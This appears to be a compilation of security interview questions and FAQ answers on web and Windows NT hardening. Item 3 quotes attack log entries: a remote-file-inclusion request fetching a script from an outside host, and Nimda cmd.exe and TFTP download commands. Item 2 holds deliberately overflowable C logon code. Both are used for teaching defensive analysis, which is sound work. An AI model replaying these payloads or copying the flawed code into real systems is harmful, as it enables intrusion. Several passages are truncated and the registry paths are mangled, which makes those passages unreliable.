1. How can I secure my client computers against my users?
One way to make it harder for the local user to do any harm to the system is to have a local PC without any hard disk or floppy disk. To boot, the system will need to talk to a boot server over the network.
2. The file is called logon_validate and a typical logon request looks like this?
You have been asked to review the source code for a compiled script that is being used to validate logon credentials for a web application. The file is called "logon_validate" and a typical logon request looks like this -
"GET /cgi-bin/logon_validate?login=test&password=test"
The source code is shown below -
void show_error(void) {
// AUTHENTICATION ERROR
exit(-1);
}
int main(int argc, char **argv) {
char error_on_auth='1';
char user[128];
char pass[128];
char *ch_ptr_begin;
char *ch_ptr_end;
/**********************************/
/* Get Username from Query String */
/**********************************/
ch_ptr_begin=(char *)strstr
(****QUERY_STRING****,"login=");
if (ch_ptr_begin==NULL)
show_error();
ch_ptr_begin+=6;
ch_ptr_end=(char *)strstr(ch_ptr_begin,"&");
if (ch_ptr_end==NULL)
show_error();
*(ch_ptr_end++)=' ';
strcpy(user,ch_ptr_begin);
/**********************************/
/* Get Password from Query String */
/**********************************/
ch_ptr_begin=(char *)strstr(ch_ptr_end,"password=");
if (ch_ptr_begin==NULL)
show_error();
ch_ptr_begin+=9;
ch_ptr_end=(char *)strstr(ch_ptr_begin,"&");
if (ch_ptr_end!=NULL) *(ch_ptr_end++)=' ';
strcpy(pass,ch_ptr_begin);
if ((strcmp(user,GOOD_USER)==0) &&
(strcmp(pass,GOOD_PASS)==0))
error_on_auth='0';
if (error_on_auth=='0') {
// AUTHENTICATION OK!!
} else {
// AUTHENTICATION ERROR
show_error();
}
// return(0); hehe could be evil ;PPPPP
exit(0);
}
This pseudo-code is taken from the NGSec Web Auth Games
http://quiz.ngsec.biz:8080/game1/level6/replicant.php
Do you see any problems with this script?
How could an attacker exploit this script to bypass
the authentication mechanisms in this script?
What are some mitigation options?
Note: Goal of question - This is most likely the most complex question being asked during the interview due to the fact that the applicant will need to apply multiple layers of analysis, including both the attacker and defender perspectives.
3. What application generated the log file entry below? What type of attack is this?
What application generated the log file entry below? What type of attack is this? Assuming the index.php program is vulnerable, was this attack successful?
========================================
Request: 200.158.8.207 - - [09/Oct/2004:19:40:46 --0400] "POST /index.php HTTP/1.1" 403 743
Handler: cgi-script
----------------------------------------
POST /index.php HTTP/1.1
Host: www.foo.com
Connection: keep-alive
Accept: */*
Accept-Language: en-us
Content-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla 4.0 (Linux)
Content-Length: 65
X-Forwarded-For: 200.158.8.207
mod_security-message: Access denied with code 403. Pattern match "unamex20-a" at POST_PAYLOAD
mod_security-action: 403
65
lid=http://th3.ownz.p5.org.uk/lila.jpg?&cmd=cd /tmp;id;lsuname -a
----------------------------------------
Note: Goal of question - to verify that the applicant can interpret various web log files, identify attacks and possible impacts. The Mod_Security Apache module generated this data in the audit_log file. The log entry indicates that an attacker is attempting to exploit a PHP file inclusion vulnerability in the index.php script. The commands being passed are in the POST PAYLOAD of the command. This attack was not successful for the following two reasons:
· The mod_security-message header indicates that Mod_Security blocked this request based on a converted Snort web-attack rule when it identified the "uname -a" data in the POST PAYLOAD.
· The attacker also made a typo in the OS commands being passed in the POST PAYLOAD. She did not include a semicolon ";" between the ls and uname commands. The target host would fail to execute the "lsuname" command.
Imagine that we are running an Apache reverse proxy server and one of the servers we are proxy for is a Windows IIS server. What does the log entry suggest has happened? What would you do in response to this entry?
68.48.142.117 - - [09/Mar/2004:22:22:57 -0500] "GET /c/winnt/system32/
cmd.exe?/c+dir HTTP/1.0" 200 566 "-" "-"
68.48.142.117 - - [09/Mar/2004:22:23:48 -0500] "GET /c/winnt/system32/
cmd.exe?/c+tftp%20-%2068.48.142.117%20GET%20cool.dll%20c:httpodbc.dll HTTP/1.0" 200 566 "-" "-"
Note: Goal of question - To see if the applicant is fluent at reading web server log files in the Common Log Format (CLF). In this scenario, the client system (68.48.142.117) is infected with the Nimda worm. These requests will not affect our Apache proxy server since this is a Microsoft vulnerability. While it does not impact Apache, the logs do indicate that the initial request was successful (status code of 200). The Nimda worm will only send the level 2 request (trying to use Trivial FTP to infect the target) if the initial request is successful. Depending on the exact proxying rules in place, it would be a good idea to inspect the internal IIS server to verify that it has not been compromised.
If you were not using Apache as the reverse proxy, what Microsoft application/tool could you use to mitigate this attack?
You could use either Microsoft's Internet and Security Acceleration (ISA) server as a front-end proxy or implement URLScan on the target IIS server. The urlscan.ini file has the AllowDotInPath directive which will block directory traversal attempts.
Note: Goal of question - Determine if the applicant utilizes computer security resources such as CERT, SANS Internet Storm Center or ICAT. Email lists such as securityfocus, bugtraq, SANS @RISK, etc. are also good resources. Recent examples of threats will vary depending on current events, but issues such as new web based worms (PHP Santy Worm) or applications, which are in wide use (awstats scripts) are acceptable.
6. What is the Microsoft Baseline Security Analyzer?
The Microsoft Baseline Security Analyzer (MBSA) is a graphical and command-line interface developed by Microsoft that can perform local or remote scans of Windows systems, assessing any missing hotfixes and vulnerabilities in certain Microsoft products. See the Microsoft Baseline Security Analyzer page on TechNet for more information.
7. What is the IIS Lockdown Tool?
This tool is part of the IIS Lockdown Wizard and it works by turning off unnecessary features of the IIS server and thereby reducing the attack surface available to an attacker. This tool also works in conjunction with URLscan to provide multiple layers of defense and protection. See the IIS Lockdown Tool page on TechNet describes its features and characteristics as well as provides steps for download and setup.
8. How do I secure Windows 2000 and IIS 5.0?
Security is a huge concern for anyone involved in business processes, management, and administration. A good resource of information on maintaining security in Windows 2000 and IIS is the security section of the Windows 2000 site. Also see Internet Information Services (IIS) on the Microsoft TechNet site, where you can find information on securing IIS servers in addition to resources that will help you maintain a secure system and stay current with any releases, updates, and tools.
9. Are server-side includes insecure?
Server side includes, snippets of server directives embedded in HTML documents, are another potential hole. A subset of the directives available in server-side includes instruct the server to execute arbitrary system commands and CGI scripts. Unless the author is aware of the potential problems it's easy to introduce unintentional side effects. Unfortunately, HTML files containing dangerous server-side includes are seductively easy to write.
Some servers, including Apache and NCSA, allow the Web master to selectively disable the types of includes that can execute arbitrary commands.
10. Are some Web server software programs more secure than others?
Again, the answer is yes, although it would be foolhardy to give specific recommendations on this point. As a rule of thumb, the more features a server offers, the more likely it is to contain security holes. Simple servers that do little more than make static files available for requests are probably safer than complex servers that offer such features as on-the-fly directory listings, CGI script execution, server-side include processing, and scripted error handling.
Version 1.3 of NCSA's Unix server contains a serious known security hole. Discovered in March of 1995, this hole allows outsiders to execute arbitrary commands on the server host. If you have a version 1.3 httpd binary whose creation date is earlier than March 1995 don't use it! Replace it with the patched 1.3 server or with version 1.4 or higher (available at the same site). The Apache plug-in replacement for NCSA is also free of this bug.
Servers also vary in their ability to restrict browser access to individual documents or portions of the document tree. Some servers provide no restriction at all, while others allow you to restrict access to directories based on the IP address of the browser or to users who can provide the correct password. A few servers, primarily commercial ones (e.g. Netsite Commerce Server, Open Market), provide data encryption as well.
The WN server, by John Franks, deserves special mention in this regard because its design is distinctively different from other Web servers. While most servers take a permissive attitude to file distribution, allowing any document in the document root to be transferred unless it is specifically forbidden, WN takes a restrictive stance. The server will not transfer a file unless it has been explicitly placed on a list of allowed documents. On-the-fly directory listings and other "promiscuous" features are also disallowed.
11. Exactly what security risks are we talking about?
There are basically three overlapping types of risk:
1. Bugs or misconfiguration problems in the Web server that allow unauthorized remote users to:
* Steal confidential documents not intended for their eyes.
* Execute commands on the server host machine, allowing them to modify the system.
* Gain information about the Web server's host machine that will allow them to break into the system.
* Launch denial-of-service attacks, rendering the machine temporarily unusable.
2. Browser-side risks, including:
* Active content that crashes the browser, damages the user's system, breaches the user's privacy, or merely creates an annoyance.
* The misuse of personal information knowingly or unkowingly provided by the end-user. 3. Interception of network data sent from browser to server or vice versa via network eavesdropping. Eavesdroppers can operate from any point on the pathway between browser and server including:
* The network on the browser's side of the connection.
* The network on the server's side of the connection (including intranets).
* The end-user's Internet service provider (ISP).
* The server's ISP.
* Either ISPs' regional access provider.
It's important to realize that "secure" browsers and servers are only designed to protect confidential information against network eavesdropping. Without system security on both browser and server sides, confidential documents are vulnerable to interception.
Protecting against network eavesdropping and system security are the subject of sections 1 to 5 of this document. Client-side security is covered in sections 6 and 7. Section 8 deals with security alerts for specific Web servers.
12. Security interview questions for network admin questions
1. What is a firewall?
2. Describe, genrally, how to manage a firewall
3. What is a Denial of Service attack?
v 4. What is a “spoofed” packet?
5. What is a SYN Flood?
6. What do you do if you are a victim of a DoS?
7. What is GPG/PGP?
8. What is SSH?
9. What is SSL? How do you create certificates?
10. What would you do if you discovered a UNIX or Network device on your network has been compromised?
11. What would you do if you discovered a Windows system on your network has been comrpromised?
12. What is DNS Hijacking?
13. What is a log host?
14. What is IDS or IDP, and can you give me an example of one?
15. Why are proxy servers useful?
16. What is web-caching?
13. Disaster Recovery Planning questions
* Do we have a written disaster recovery plan?
o Are copies in possession of departmental management? At their homes?
* • When was our plan last updated?
* Does our plan include:
o A list of who in the department is empowered to declare a disaster? A list of critical personnel who will need to respond to a disaster?
--------- Telephone numbers (home, cell) for all critical personnel?
o An inventory of all our critical business functions?
o An inventory of the computer systems that support those functions?
------.. Including not only servers but critical desktop computers (e.g. departmental secretaries' computers)?
o A rank-ordered list of which business functions we would restore first in event of a disaster?
* Suppose we had to evacuate the building due to a major disaster (fire, flood, chemical or biological event renders building inaccessible). Suppose all our systems are offline. How long would it take to restore basic departmental business functions and data from our offsite backup tapes?
* What confidential personal information (e.g., Social Security numbers) do we store on our servers? Do we minimize use of SSNs to the extent feasible? Could we use another identifier, such as MSU PID numbers instead?
o If we do need to store confidential data such as SSNs locally, how secure are the servers that house the information?
* Instead of storing personal confidential information locally, could we do business in some other way? Could we eliminate those confidential data elements from our local databases? Could we instead routinely access data as needed from University data services (thus obviating the need for the local copies)?
* Have all personnel within the unit been adequately trained in University data security requirements and applicable state or federal laws and regulations (e.g. FERPA, HIPAA, Gramm-Leach-Bliley Act)?
15. Network Security questions
* Do we use hardware firewalls to protect critical servers and desktop computers?
o How often do we examine event logs and real-time displays to see if we are under attack?
o Do we use software firewalls to protect end-user computers (e.g. laptops that may spend time away from protection of the departmental hardware firewall)?
* Do we monitor the network for security exposures using auditing tools such as ISS, or Nessus?
* Do we monitor the network for unusual patterns of traffic? (E.g. a server or an end user computer suddenly begins emitting huge amounts of traffic.)
* Do we ensure that all critical business transactions take place using encrypted transmission? (E.g. SSL for Web or email transactions, SSH or VPN for remote login, encrypted file transfers)?
* • How often do we back up our servers? How often do we back up the desktop computers that we use for departmental business functions
o A common practice is weekly backups of all data, and daily backups of files or data that have changed.
* • What backup media do we use? Is hardware to read that media commonly available?
* • When did we last test our backup procedures to make sure data can be restored? <
* Are our backups in “image” format (requiring identical hardware or software to restore)? Could we load our backups into another system if need be?
* • Do we take backup tapes offsite? Where? How often?
* • How often do we back up end user desktops? Or is this the responsibility of end users
* Do we run anti-virus software? Which tool(s) do we use? o On all servers? On all critical desktops? o On all end user desktops?
* • Are our virus definitions current?
o How often are the definitions updated? (At least twice weekly is advised; many experts suggest daily updates.)
* • Do we run spyware detection software on our servers and on end user computers?
* • How are servers and end-user computers given new antivirus definitions? (From the vendor's Web site, from a local server, or otherwise?)
* • Have we enabled automatic scanning for virus definition updates on servers and end-user computers?
* Do we scan incoming and outgoing email for viruses (as well as other modes of transmission)?
* Do we educate our users about virus avoidance (e.g. be wary of attachments in general, don't run .EXE files sent via email, etc.)
* computers to install new software, so as to limit the capacity of viruses to install themselves? o E.g. using Microsoft's Group Policy Option?
18. Securing New Systems questions
* When we acquire a new server or desktop computer, do we follow a defined set of procedures to set it up?
* How do we “lock down” a new system? Do we:
Turn on or install software firewalls? • And/or use a hardware firewall? o Turn off unnecessary services (e.g. FTP on a desktop computer that doesn't need to support this protocol)? o Rename administrator user names as appropriate? Change default passwords? o Follow product-specific advice or expert checkists on how to secure new servers and applications? (For instance, software vendors and outside experts offer white papers or checklists on how to secure, for instance, a Windows XP workstation or a Linux server.)
* Do we test new systems for security using tools such as the Microsoft Baseline Security Analyzer, etc?
19. Where is the password that I configure a service to start with stored?
HKLMSECURITYPolicySecrets_SC_servicenameCurrVal contains the encrypted password of the service. The password is not machine or account dependent. i.e. a user foo with password bar in domain X in NT3.51 has the same encrypted value as user baz in domain Y with NT4.0 (with password bar).
20. Can I grant access to someone to view or change the logfiles?
Yes you can, but there is an error on the manual on how to do it. Check out Knowledge Base article Q142615 to see why the "Manage auditing and security log" privilege does not work as documented.
21. There are a number of things to do to get better security on remote connections
There are a number of things to do to get better security on remote connections
* Putting the RAS servers on one or more own interfaces in the firewall
* Be sure to turn on auditing for the RAS function
* Enable authentication
* Enable session encryption
* Enable dialback
* Specify which hours remote users are allowed
To turn on auditing for RAS, use the regedit utility to set the key
HKEY_LOCAL_MACHINESystemCurrentControlSetServicesRasManParametersLogging
to 1, then restart RAS.
22. What is AFTP, NVAlert and NVRunCmd?
When installing the complete SNA package, you will get at least three more services, AFTP, NVAlert and NVRunCmd.
* AFTP is like its TCP/IP counterpart FTP a tool to transfer files over the net. It might be used for anonymous logins as well.
* NVRunCmd is a service that lets someone running the NetView network monitoring tool send ordinary commands over the net that will be executed locally on the Windows NT machine.
Make sure that you have disabled these services if you want to run a more secure setup.
On the NT 4.0 CD-ROM there are a utility called rollback.exe that will corrupt your system if run. It is not intended for end-users, but someone slipped and the tool is now out on many users systems.
Without any sign of warning, rollback.exe will remove all system registry entries, which in turn will leave the system in a state where there are not easy way to recover. One have to grab the emergency repair disk and do a restore from the latest backup.
There are a number of problems with web servers. Bugs in the server, stupid CGI scripts, erroneous configurations, strange other services (e.g. data base connections) are just a few things that might be used to damage your security.
You might want to look at the WWW Security FAQ to get some general security information on WWW.
If you install an Windows NT machine as a web server or a firewall, you should tighten up the security on that box more that you should do to ordinary machines on your internal network since a machine accessible from the Internet are more vulnerable and more likely to be attacked. Securing the machine gives you a bastion host. Some of the things you should do include
* Remove all protocol stacks except TCP/IP, since IP is the only protocol that runs on the Internet
* Remove some network bindings
* Disable all unnecessary accounts, like guest
* Remove share permissions and default shares
* Remove network access for everyone (User Manger -> Policies -> User rights, "Access this computer from the network")
* Disable unnecessary services (FTP, etc)
* Enable audit logging
* Track the audit information
25. What are giant packets? Or, is Windows NT susceptible to the PING attack?
There are mixed reports whether or not NT is vulnerable to this attack. By using ping to send a large packet to certain systems, they might hang or crash.
Windows NT 3.51 seem to be vulnerable to this attack. A knowledge base article, Q132470, describes symptoms in Windows NT 3.51, and also include a pointer to a patch for this problem
26. What should I think about when using SNMP?
In other SNMP-enabled machines you can configure both an write and a read community name. On a Windows NT system you can only set one. Not having a community name does not disable the service, as one might expect. According to David LeBlanc, :
27. What ports must I enable to let NBT (NetBios over TCP/IP) through my firewall?
First of all, you should really, really reconsider if this is such a good idea to let NBT traffic through your firewall. Especially if the firewall is between your internal network and Internet.
The problem with NBT is that at once you open it up through the firewall, people will have potential access to all NetBios services, not just a selection of them, such as printing.
The following is a list of the ports used by NBT.
* netbios-ns 137/tcp NETBIOS Name Service
* netbios-ns 137/udp NETBIOS Name Service
* netbios-dgm 138/tcp NETBIOS Datagram Service
* netbios-dgm 138/udp NETBIOS Datagram Service
* netbios-ssn 139/tcp NETBIOS Session Service
* netbios-ssn 139/udp NETBIOS Session Service
28. Is NT susceptible to SYN flood attacks?
Yes. To my knowledge, all IP based systems are possible victims for the attack.
As shipped, some older versions of Windows NT had a guest account that was easily used by outsiders. Newer versions of NT have their guest account closed as shipped from Microsoft. Anyway, you should check out your guest account and disable it as much as possible.
Some people remove the guest account from their system, but unfortunately, Microsoft ship some product that relies upon the usage of that account. For example, if you use Microsoft Internet Studio in combination with Microsoft SQL or Microsoft Access running on another computer than the one running Internet Studio.
Users are susceptible to a number of attacks, such as dictionary password guessing. In Windows NT, one way to protect against those types of attacks is to set the number of failed logins before disabling the account temporary or until the system manager manually enables it again.
31. How do I get my computer C2-level secure, or, what is c2config?
On the CD-ROM that is included in the NT Resource Kit, there is a program called c2config that can be used for tighten the security of a NT based computer.
Be aware, that c2config will not work well on systems with localized environment, e.g. a german NT that uses ACLs in german, not in english.
In general, any computer that is not physically secured is not fully secured. If anyone is able to get access to the machine, it is possible to boot it from a diskette, CD-ROM or just steal the hard disk and use it in another computer.
There is some confusion on this point when you consult the Microsoft sources on the subject. Ever since MS discovered the Internet, a secure channel is any point-to-point network connection established between a client and a server that "provides privacy, integrity, and authentication" (see $$$: Microsoft Internet Security Framework: Answers to Frequently Asked Questions ).
"Before Internet", a secure channel was (and still is) the magic connection between WNT computers in a domain. This kind of channel is used for transportation of sensitive data, such as user credentials during a domain logon and replication of the account database between DCs.
The secure channel is established as soon as the domain member machine is booted and is based on a shared secret that is used as the key for encrypting the data that travels through the channel. Each domain member has a machine account defined in the domain SAM database that is created when the machine joins the domain. The password of this account is used as the shared secret for encryption of the channel. The member machine stores it in the registry, where it can be retrieved using the lsadump program by Paul Ashton .
A problem with this is that the initial password (on a WS account) is poorly chosen (unicode(machine-name)). This means that anybody that can listen in to the network at the time of a domain join will be able to calculate the session key used to encrypt the channel, and by this can get hold of the user credentials of anybody doing a network logon from that particular machine. The password is changed as soon as the machine is rebooted after joining the domain and then periodically changed every 7:th day, but the new password is communicated through -- guess what -- the now not so secure channel, so as long as the listener keeps his ear on the wire, he will have the session key. No known solution, but the algorithm for encrypting the new password is not published (yet).
34. What is LSA (Local Security Authority)?
LSA stands for Local Security Authority. This is an internal subsystem (as opposed to an environmental ditto, such as Win32) within Windows NT that "generates access tokens [...], manages the local security policy, and provides interactive user authentication services" (from "Windows NT resource guide", ISBN 1-55615-653-7).
35. How well the person can do architecture from scratch?
The question about "here design a secure network" on the white board. This is an open ended question, and works on how well the person can do architecture from scratch. My favorite variation on this is that given a web server, an e-mail system, switch, router, Firewall, and SIM or central data repository (aka kiwi syslog daemon) and IPS system, tie them all together into a Security Information management system, show information paths, ports used, and protocols used. Usually the original question does not go into ports and protocols and remains at the logical hierarchy, assuming that all the systems work and can talk back to a central repository, this really opens up the questioning to how well they not only understand architecture, but dependencies, interdependencies, protocol use, and the security arrangements around protocol use. Same question, just more in-depth to determine how well they understand the risks, limitations, and support for various systems in the path.
All the above questions, depending on which ones are used, can give a real good indication of what the person knows to do, and how well they think about large and small issues. All of these questions do not trigger any HR issues, and as long as they pertain to the job, should not get the interviewer into any issues. The key thing on these questions is that the interviewer has to be knowledgeable about these, or if it is team interviewing, they should be knowledgeable about the answers. Many of these are leading and can provide for some really interesting responses back from the interviewee's. These are really just solid technical interview questions that many information security people should be able to answer given how many years they have been in the field, or how much exposure they have had to various technologies, or what they like to do.